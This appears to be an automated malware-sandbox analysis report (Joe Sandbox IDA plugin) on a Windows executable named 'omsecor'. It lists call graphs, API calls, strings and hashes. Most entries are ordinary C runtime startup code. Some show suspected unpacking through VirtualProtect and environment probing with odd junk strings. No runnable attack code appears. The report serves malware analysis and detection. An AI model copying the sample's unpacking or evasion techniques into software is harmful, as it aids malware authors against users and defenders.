4725->4729 4729->4728 4730 401f3a 4729->4730 4765 402419 4730->4765 4733 401aaa __init_pointers 67 API calls 4734 401f4a 4733->4734 4735 401aaa __init_pointers 67 API calls 4734->4735 4736 401f5a 4735->4736 4737 401aaa __init_pointers 67 API calls 4736->4737 4738 401f6a 4737->4738 4739 401aaa __init_pointers 67 API calls 4738->4739 4740 401f7a 4739->4740 4772 403378 4740->4772 4743 401ff0 4744 401bca __mtterm 70 API calls 4743->4744 4744->4728 4745 401b21 _raise 67 API calls 4746 401f9b 4745->4746 4746->4743 4747 404032 __calloc_crt 67 API calls 4746->4747 4748 401fb4 4747->4748 4748->4743 4749 401b21 _raise 67 API calls 4748->4749 4750 401fce 4749->4750 4750->4743 4751 401fd5 4750->4751 4752 401c07 _raise 67 API calls 4751->4752 4753 401fdd GetCurrentThreadId 4752->4753 4753->4728 4755 401bd4 4754->4755 4756 401be0 4754->4756 4758 401b21 _raise 67 API calls 4755->4758 4757 401bf4 TlsFree 4756->4757 4759 401c02 4756->4759 4757->4759 4758->4756 4760 4033db RtlDeleteCriticalSection 4759->4760 4761 4033f3 4759->4761 4762 403f64 __mtinitlocknum 67 API calls 4760->4762 4763 403405 RtlDeleteCriticalSection 4761->4763 4764 401e8d 4761->4764 4762->4759 4763->4761 4766 401b18 _raise 67 API calls 4765->4766 4767 40241f __init_pointers 4766->4767 4776 404106 4767->4776 4770 401aaa __init_pointers 67 API calls 4771 401f3f 4770->4771 4771->4733 4775 403381 4772->4775 4773 404763 ___crtInitCritSecAndSpinCount 67 API calls 4773->4775 4774 401f87 4774->4743 4774->4745 4775->4773 4775->4774 4777 401aaa __init_pointers 67 API calls 4776->4777 4778 402451 4777->4778 4778->4770 4779 401877 4780 401886 4779->4780 4781 40188c 4779->4781 4782 4023ea _raise 67 API calls 4780->4782 4785 40240a 4781->4785 4782->4781 4784 401891 _raise 4786 4022f7 _raise 67 API calls 4785->4786 4787 402415 4786->4787 4787->4784 4788 4027fa 4789 402807 4788->4789 4792 40280c _strlen 4788->4792 4791 403f46 ___initmbctable 111 API calls 4789->4791 4790 402818 4791->4792 4792->4790 4793 404032 __calloc_crt 67 API calls 4792->4793 4794 40283f _strlen 4793->4794 4794->4790 4795 40289a 4794->4795 4797 404032 __calloc_crt 67 API calls 4794->4797 4798 4028bf 4794->4798 4800 404bcb _strcpy_s 67 API calls 4794->4800 4801 404121 __invoke_watson 10 API calls 4794->4801 4796 403f64 __mtinitlocknum 67 API calls 4795->4796 4796->4790 4797->4794 4799 403f64 __mtinitlocknum 67 API calls 4798->4799 4799->4790 4800->4794 4801->4794 4802 4023fb 4803 4022f7 _raise 67 API calls 4802->4803 4804 402406 4803->4804 4887 40213b SetUnhandledExceptionFilter 3992 402f3e HeapCreate 3993 402f61 3992->3993 3994 402f5e 3992->3994 4001 402ee3 3993->4001 3997 402f94 4000 402f7f HeapDestroy 4000->3994 4002 4021f2 ___crtInitCritSecAndSpinCount 67 API calls 4001->4002 4003 402efa 4002->4003 4004 402f09 4003->4004 4005 404121 __invoke_watson 10 API calls 4003->4005 4006 402229 __FF_MSGBANNER 67 API calls 4004->4006 4005->4004 4007 402f15 4006->4007 4008 402f24 4007->4008 4009 404121 __invoke_watson 10 API calls 4007->4009 4008->3997 4010 405045 RtlAllocateHeap 4008->4010 4009->4008 4011 402f7a 4010->4011 4011->3997 4011->4000 4805 4020fe 4806 402136 4805->4806 4808 40210c 4805->4808 4808->4806 4809 4040cd 4808->4809 4810 4040d9 _raise 4809->4810 4811 401d3d __setmbcp 67 API calls 4810->4811 4813 4040de 4811->4813 4812 406a50 _abort 69 API calls 4814 404100 _raise 4812->4814 4813->4812 4814->4806

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 90 4012c0-4012e8 FindFirstFileA call 401080
                          APIs
                          • FindFirstFileA.KERNELBASE(ks clku .d,E51E2AD4), ref: 004012DD
                            • Part of subcall function 00401080: GetTickCount.KERNEL32 ref: 00401096
                            • Part of subcall function 00401080: GetDesktopWindow.USER32 ref: 004010B8
                            • Part of subcall function 00401080: GetClassNameA.USER32(00000000,00000000,00000400), ref: 004010CC
                            • Part of subcall function 00401080: GlobalAlloc.KERNELBASE(00000000,000F6950), ref: 004010EE
                            • Part of subcall function 00401080: GetCurrentProcess.KERNEL32(?), ref: 0040114B
                            • Part of subcall function 00401080: GetProcessIoCounters.KERNEL32(00000000), ref: 0040114E
                            • Part of subcall function 00401080: GetCurrentProcess.KERNEL32(?,?,?,?), ref: 004011B9
                            • Part of subcall function 00401080: GetProcessTimes.KERNELBASE(00000000), ref: 004011BC
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1663507397.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.1663486120.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000004.00000002.1663507397.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000004.00000002.1663565291.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Process$Current$AllocClassCountCountersDesktopFileFindFirstGlobalNameTickTimesWindow
                          • String ID: ks clku .d
                          • API String ID: 973805369-4096487313
                          • Opcode ID: f572dfb4ccbad4a63051ea1b90dc6402510860d94203dc7c9fb76134c3d65c66
                          • Instruction ID: 8201e92c16030f82e268503128fd01f75d7624b5287a074f0a6a6b49dcde2be8
                          • Opcode Fuzzy Hash: f572dfb4ccbad4a63051ea1b90dc6402510860d94203dc7c9fb76134c3d65c66
                          • Instruction Fuzzy Hash: 13C012701042448FC330AF24DE0ABAA37E4AB48300F00093AA5E8E60A4DA3455598A8A

                          Control-flow Graph

                          APIs
                          • GetTickCount.KERNEL32 ref: 00401096
                          • GetDesktopWindow.USER32 ref: 004010B8
                          • GetClassNameA.USER32(00000000,00000000,00000400), ref: 004010CC
                          • GlobalAlloc.KERNELBASE(00000000,000F6950), ref: 004010EE
                          • GetCurrentProcess.KERNEL32(?), ref: 0040114B
                          • GetProcessIoCounters.KERNEL32(00000000), ref: 0040114E
                          • GetCurrentProcess.KERNEL32(?,?,?,?), ref: 004011B9
                          • GetProcessTimes.KERNELBASE(00000000), ref: 004011BC
                          Strings
                          • cjkU dklu UUido c;aopi quio ,mvnciu cxklnsp, xrefs: 00401131
                          Memory Dump Source
                          • Source File: 00000004.00000002.1663507397.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.1663486120.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000004.00000002.1663507397.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000004.00000002.1663565291.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Process$Current$AllocClassCountCountersDesktopGlobalNameTickTimesWindow
                          • String ID: cjkU dklu UUido c;aopi quio ,mvnciu cxklnsp
                          • API String ID: 509927810-2920797944
                          • Opcode ID: e0b8abb97aa25d1df5e5a951dd4f26f151847d18626d26f9063e3e0a3aa5dc8f
                          • Instruction ID: 30898c1c04428891cb82ceb7e239a2b08516cd6c9376f1465321758e23d54b14
                          • Opcode Fuzzy Hash: e0b8abb97aa25d1df5e5a951dd4f26f151847d18626d26f9063e3e0a3aa5dc8f
                          • Instruction Fuzzy Hash: E55127F1D041744BDB288B298D54BB9BBF5ABC5305F0881BEE689B7381D5385A48CF28

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 17 407a98-407a9f GetModuleHandleA 18 407aa1-407ab0 call 407ab5 17->18 19 407adf 17->19 29 407ab2-407abd GetProcAddress 18->29 30 407b17 18->30 20 407ae1-407ae5 19->20 22 407b24 call 407b29 20->22 23 407ae7-407aef GetModuleHandleA 20->23 26 407af1-407af9 23->26 26->26 28 407afb-407afe 26->28 28->20 31 407b00-407b02 28->31 29->19 33 407abf-407acc VirtualProtect 29->33 32 407b18-407b20 30->32 36 407b04-407b06 31->36 37 407b08-407b10 31->37 41 407b22 32->41 34 407ade 33->34 35 407ace-407adc VirtualProtect 33->35 34->19 35->34 39 407b11-407b12 GetProcAddress 36->39 37->39 39->30 41->28
                          APIs
                          • GetModuleHandleA.KERNEL32(00407A8F), ref: 00407A98
                          • GetModuleHandleA.KERNEL32(?,00407A8F), ref: 00407AEA
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00407B12
                            • Part of subcall function 00407AB5: GetProcAddress.KERNEL32(00000000,00407AA6), ref: 00407AB6
                            • Part of subcall function 00407AB5: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00407AA6,00407A8F), ref: 00407AC8
                            • Part of subcall function 00407AB5: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00407AA6,00407A8F), ref: 00407ADC
                          Memory Dump Source
                          • Source File: 00000004.00000002.1663507397.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.1663486120.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000004.00000002.1663507397.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000004.00000002.1663565291.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProcProtectVirtual
                          • String ID:
                          • API String ID: 2099061454-0
                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                          • Instruction ID: 53099f65029657388ac4b193d9ffb221688749bb3c6439a8311ebbe5e3b7996f
                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                          • Instruction Fuzzy Hash: B501CC00F4D24539DA2051754C0197F7AA89A533687141677A111B72D3D9BCBE0692BF

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 42 407a59-407a6e 43 407a70-407a78 42->43 44 407adf 42->44 43->44 46 407a7a-407aa8 call 407a98 43->46 45 407ae1-407ae5 44->45 47 407b24 call 407b29 45->47 48 407ae7-407aef GetModuleHandleA 45->48 54 407aaa 46->54 55 407b1e-407b20 46->55 51 407af1-407af9 48->51 51->51 53 407afb-407afe 51->53 53->45 56 407b00-407b02 53->56 57 407aac-407ab0 54->57 58 407b0d-407b10 54->58 59 407b22 55->59 60 407b18-407b1d 55->60 61 407b04-407b06 56->61 62 407b08-407b0c 56->62 65 407b17 57->65 66 407ab2-407abd GetProcAddress 57->66 63 407b11-407b12 GetProcAddress 58->63 59->53 60->55 61->63 62->58 63->65 65->60 66->44 67 407abf-407acc VirtualProtect 66->67 68 407ade 67->68 69 407ace-407adc VirtualProtect 67->69 68->44 69->68
                          APIs
                          • GetModuleHandleA.KERNEL32(?,00407A8F), ref: 00407AEA
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00407B12
                            • Part of subcall function 00407A98: GetModuleHandleA.KERNEL32(00407A8F), ref: 00407A98
                            • Part of subcall function 00407A98: GetProcAddress.KERNEL32(00000000,00407AA6), ref: 00407AB6
                            • Part of subcall function 00407A98: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00407AA6,00407A8F), ref: 00407AC8
                            • Part of subcall function 00407A98: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00407AA6,00407A8F), ref: 00407ADC
                          Memory Dump Source
                          • Source File: 00000004.00000002.1663507397.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.1663486120.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000004.00000002.1663507397.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000004.00000002.1663565291.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProcProtectVirtual
                          • String ID:
                          • API String ID: 2099061454-0
                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                          • Instruction ID: 8932c9a1b40894ead954c0166dfb712feb6fdadac19e13bdf209ed336a7ac0e8
                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                          • Instruction Fuzzy Hash: DE21F621A4D2416EEB2186B44C0166B7BE49B13368F1946A7D141EB2C3D1BC7D4687AB

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 70 407ab5-407abd GetProcAddress 71 407adf 70->71 72 407abf-407acc VirtualProtect 70->72 75 407ae1-407ae5 71->75 73 407ade 72->73 74 407ace-407adc VirtualProtect 72->74 73->71 74->73 76 407b24 call 407b29 75->76 77 407ae7-407aef GetModuleHandleA 75->77 79 407af1-407af9 77->79 79->79 80 407afb-407afe 79->80 80->75 81 407b00-407b02 80->81 82 407b04-407b06 81->82 83 407b08-407b10 81->83 84 407b11-407b17 GetProcAddress 82->84 83->84 87 407b18-407b20 84->87 89 407b22 87->89 89->80
                          APIs
                          • GetProcAddress.KERNEL32(00000000,00407AA6), ref: 00407AB6
                          • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00407AA6,00407A8F), ref: 00407AC8
                          • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00407AA6,00407A8F), ref: 00407ADC
                          • GetModuleHandleA.KERNEL32(?,00407A8F), ref: 00407AEA
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00407B12
                          Memory Dump Source
                          • Source File: 00000004.00000002.1663507397.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.1663486120.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000004.00000002.1663507397.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000004.00000002.1663565291.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProcProtectVirtual$HandleModule
                          • String ID:
                          • API String ID: 2152742572-0
                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                          • Instruction ID: 39b30828dda2cca0c429c80848ec8113aa03dbdf6ed959677c669bf53de2d5ad
                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                          • Instruction Fuzzy Hash: 98F0F400E8D2043CEE2151B40C01ABBBBEC86633687241A27A211E72C3D4BC7E0692BB

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 93 402f3e-402f5c HeapCreate 94 402f61-402f6e call 402ee3 93->94 95 402f5e-402f60 93->95 98 402f70-402f7d call 405045 94->98 99 402f94-402f97 94->99 98->99 102 402f7f-402f92 HeapDestroy 98->102 102->95
                          APIs
                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,004017AC,00000001), ref: 00402F4F
                          • HeapDestroy.KERNEL32 ref: 00402F85
                          Memory Dump Source
                          • Source File: 00000004.00000002.1663507397.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.1663486120.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000004.00000002.1663507397.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000004.00000002.1663565291.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$CreateDestroy
                          • String ID:
                          • API String ID: 3296620671-0
                          • Opcode ID: 7bbac67fe878dc3ebcdb7e33c34032945d00a98356e3978511e20ae8c663db98
                          • Instruction ID: 98ebcd61208b82bef51758d9ec37e8992e6abd11400b15b10fa3614edeb5f36b
                          • Opcode Fuzzy Hash: 7bbac67fe878dc3ebcdb7e33c34032945d00a98356e3978511e20ae8c663db98
                          • Instruction Fuzzy Hash: D3E092706643029EEB40AB31AF0D72636E4E74078AF10843BF548F51E2EBBC8605AF4C
                          APIs
                          • IsDebuggerPresent.KERNEL32 ref: 004020B3
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004020C8
                          • UnhandledExceptionFilter.KERNEL32(00408204), ref: 004020D3
                          • GetCurrentProcess.KERNEL32(C0000409), ref: 004020EF
                          • TerminateProcess.KERNEL32(00000000), ref: 004020F6
                          Memory Dump Source
                          • Source File: 00000004.00000002.1663507397.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.1663486120.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000004.00000002.1663507397.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000004.00000002.1663565291.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                          • String ID:
                          • API String ID: 2579439406-0
                          • Opcode ID: bf9e4dc40609aede9a22b05b14043da035278ae7b0f51125174d724f9b36215e
                          • Instruction ID: b20ca496c67c0111f9bdb02fdd2caa8760b953d18a2e8655b2b95bf976f6fc72
                          • Opcode Fuzzy Hash: bf9e4dc40609aede9a22b05b14043da035278ae7b0f51125174d724f9b36215e
                          • Instruction Fuzzy Hash: 5321AEB5950304DFC710EF24EF48A453BB5BF88306F10403AE549B36A1E7B859A59F9E

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 103 402465-40246f 104 402471-402478 103->104 105 402480-402483 104->105 106 40247a-40247e 104->106 107 402600-402604 105->107 108 402489-402495 call 404c30 105->108 106->104 106->105 111 40249b-4024a5 call 404c30 108->111 112 4025cc-4025d8 GetStdHandle 108->112 118 4024b4-4024ba 111->118 119 4024a7-4024ae 111->119 114 4025da-4025dd 112->114 115 4025ff 112->115 114->115 117 4025df-4025f9 call 404b40 WriteFile 114->117 115->107 117->115 118->115 122 4024c0-4024db call 404bcb 118->122 119->112 119->118 125 4024ea-402506 GetModuleFileNameA 122->125 126 4024dd-4024e7 call 404121 122->126 128 402508-40251d call 404bcb 125->128 129 40252e-402539 call 404b40 125->129 126->125 128->129 137 40251f-40252b call 404121 128->137 135 402573 129->135 136 40253b-402560 call 404b40 call 404a82 129->136 139 402575-402586 call 404a11 135->139 136->135 151 402562-402571 call 404121 136->151 137->129 146 402595-4025a8 call 404a11 139->146 147 402588-402592 call 404121 139->147 155 4025b7-4025ca call 404854 146->155 156 4025aa-4025b4 call 404121 146->156 147->146 151->139 155->115 156->155
                          APIs
                          • _strcpy_s.LIBCMT ref: 004024D1
                          • __invoke_watson.LIBCMT ref: 004024E2
                          • GetModuleFileNameA.KERNEL32(00000000,0040B091,00000104), ref: 004024FE
                          • _strcpy_s.LIBCMT ref: 00402513
                          • __invoke_watson.LIBCMT ref: 00402526
                          • _strlen.LIBCMT ref: 0040252F
                          • _strlen.LIBCMT ref: 0040253C
                          • __invoke_watson.LIBCMT ref: 00402569
                          • _strcat_s.LIBCMT ref: 0040257C
                          • __invoke_watson.LIBCMT ref: 0040258D
                          • _strcat_s.LIBCMT ref: 0040259E
                          • __invoke_watson.LIBCMT ref: 004025AF
                          • GetStdHandle.KERNEL32(000000F4,?,?,00000000,77735E70,00000003,00402631,000000FC,0040667C,00000001,00000000,00000000,?,00403FFF,?,00000001), ref: 004025CE
                          • _strlen.LIBCMT ref: 004025EF
                          • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,00403FFF,?,00000001,?,00403478,00000018,004093D0,0000000C,00403507,?), ref: 004025F9
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1663507397.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.1663486120.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000004.00000002.1663507397.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000004.00000002.1663565291.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: __invoke_watson$_strlen$File_strcat_s_strcpy_s$HandleModuleNameWrite
                          • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                          • API String ID: 1879448924-4022980321
                          • Opcode ID: 37e970e7a91dfcbae92fe90700a2f9926538e6433e08e305a6de03e0bd6f72c8
                          • Instruction ID: 3ad8829dabe9c8e6b7970468b651ade891dcb41a26c93daa50347fadcc2e15d8
                          • Opcode Fuzzy Hash: 37e970e7a91dfcbae92fe90700a2f9926538e6433e08e305a6de03e0bd6f72c8
                          • Instruction Fuzzy Hash: CF3127B2A402153AE62136326F5EF2F314C9B91315F14013BFE09B26D6FABD9A1441FE

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 162 401e76-401e86 GetModuleHandleA 163 401e91-401ed9 GetProcAddress * 4 162->163 164 401e88-401e90 call 401bca 162->164 166 401ef1-401f10 163->166 167 401edb-401ee2 163->167 170 401f15-401f23 TlsAlloc 166->170 167->166 169 401ee4-401eeb 167->169 169->166 171 401eed-401eef 169->171 172 401ff5 170->172 173 401f29-401f34 TlsSetValue 170->173 171->166 171->170 174 401ff7-401ff9 172->174 173->172 175 401f3a-401f89 call 402419 call 401aaa * 4 call 403378 173->175 188 401ff0 call 401bca 175->188 189 401f8b-401fa6 call 401b21 175->189 188->172 189->188 194 401fa8-401fba call 404032 189->194 194->188 197 401fbc-401fd3 call 401b21 194->197 197->188 201 401fd5-401fee call 401c07 GetCurrentThreadId 197->201 201->174
                          APIs
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,004017BE), ref: 00401E7C
                          • __mtterm.LIBCMT ref: 00401E88
                            • Part of subcall function 00401BCA: TlsFree.KERNEL32(00000002,00401FF5), ref: 00401BF5
                            • Part of subcall function 00401BCA: RtlDeleteCriticalSection.NTDLL(00000000), ref: 004033DC
                            • Part of subcall function 00401BCA: RtlDeleteCriticalSection.NTDLL(00000002), ref: 00403406
                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00401E9E
                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00401EAB
                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00401EB8
                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00401EC5
                          • TlsAlloc.KERNEL32 ref: 00401F15
                          • TlsSetValue.KERNEL32(00000000), ref: 00401F30
                          • __init_pointers.LIBCMT ref: 00401F3A
                          • __calloc_crt.LIBCMT ref: 00401FAF
                          • GetCurrentThreadId.KERNEL32 ref: 00401FDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1663507397.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.1663486120.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000004.00000002.1663507397.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000004.00000002.1663565291.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                          • API String ID: 2125014093-3819984048
                          • Opcode ID: 354152662784ca78ebbfdb9d1e706067e68d0d363f7f71506686b96da0da82fe
                          • Instruction ID: 2b6f412a48510a2ea5e28321b190ff4220801d9e6bfc04da0c4d4af9d52f3434
                          • Opcode Fuzzy Hash: 354152662784ca78ebbfdb9d1e706067e68d0d363f7f71506686b96da0da82fe
                          • Instruction Fuzzy Hash: AF318F319483029BE7146F75AF05B063AA5AF40355712053FF861B22F5EF7C8490EB5E

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 204 404854-404876 call 401b18 207 40492a-404934 204->207 208 40487c-40488b LoadLibraryA 204->208 211 404936-40493c 207->211 212 4049af-4049b7 207->212 209 404891-4048a1 GetProcAddress 208->209 210 404a0a 208->210 209->210 215 4048a7-4048e9 call 401aaa GetProcAddress call 401aaa GetProcAddress call 401aaa call 4021f2 209->215 216 404a0c-404a10 210->216 211->212 217 40493e-404957 call 401b21 * 2 211->217 213 4049b9-4049c2 call 401b21 212->213 214 4049ea-4049f8 call 401b21 212->214 213->214 227 4049c4-4049cb 213->227 214->210 226 4049fa-404a08 214->226 244 4048f8-4048fc 215->244 245 4048eb-4048f5 call 404121 215->245 217->212 232 404959-40495b 217->232 226->216 227->214 237 4049cd-4049d5 227->237 232->212 236 40495d-404961 232->236 246 404963-404974 236->246 247 40497c-404988 call 402229 236->247 237->214 239 4049d7-4049e0 call 401b21 237->239 239->214 252 4049e2-4049e7 239->252 244->207 250 4048fe-404914 GetProcAddress call 401aaa 244->250 245->244 246->247 258 404976-40497a 246->258 259 404997-40499b 247->259 260 40498a-404994 call 404121 247->260 250->207 264 404916-404925 GetProcAddress call 401aaa 250->264 252->214 258->212 258->247 262 4049a6-4049ad 259->262 263 40499d-4049a4 259->263 260->259 262->214 263->214 264->207
                          APIs
                          • LoadLibraryA.KERNEL32(USER32.DLL,00000000,00000000,00000314,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00404881
                          • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0040489D
                            • Part of subcall function 00401AAA: TlsGetValue.KERNEL32(00000000,00401B1F,00000000,00404862,00000000,00000000,00000314,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AB7
                            • Part of subcall function 00401AAA: TlsGetValue.KERNEL32(00000004,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401ACE
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004048BA
                            • Part of subcall function 00401AAA: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AE3
                            • Part of subcall function 00401AAA: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00401AFE
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004048CF
                          • __invoke_watson.LIBCMT ref: 004048F0
                            • Part of subcall function 00404121: _memset.LIBCMT ref: 004041AD
                            • Part of subcall function 00404121: IsDebuggerPresent.KERNEL32(?,?,00000000), ref: 004041CB
                            • Part of subcall function 00404121: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000000), ref: 004041D5
                            • Part of subcall function 00404121: UnhandledExceptionFilter.KERNEL32(0040B078,?,?,00000000), ref: 004041DF
                            • Part of subcall function 00404121: GetCurrentProcess.KERNEL32(C000000D,?,?,00000000), ref: 004041FA
                            • Part of subcall function 00404121: TerminateProcess.KERNEL32(00000000,?,?,00000000), ref: 00404201
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000000,00401BB6,?,?,?,00402F66), ref: 00401B2E
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000004,?,?,?,00402F66), ref: 00401B45
                            • Part of subcall function 00401B21: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00402F66), ref: 00401B5A
                            • Part of subcall function 00401B21: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00401B75
                          • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 00404904
                          • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 0040491C
                          • __invoke_watson.LIBCMT ref: 0040498F
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1663507397.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.1663486120.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000004.00000002.1663507397.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000004.00000002.1663565291.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProc$Value$ExceptionFilterHandleModuleProcessUnhandled__invoke_watson$CurrentDebuggerLibraryLoadPresentTerminate_memset
                          • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                          • API String ID: 2940365033-232180764
                          • Opcode ID: d0843e3b680be133648664f8717c69194e3d07d516d4994a3cb1c1e79535d4f8
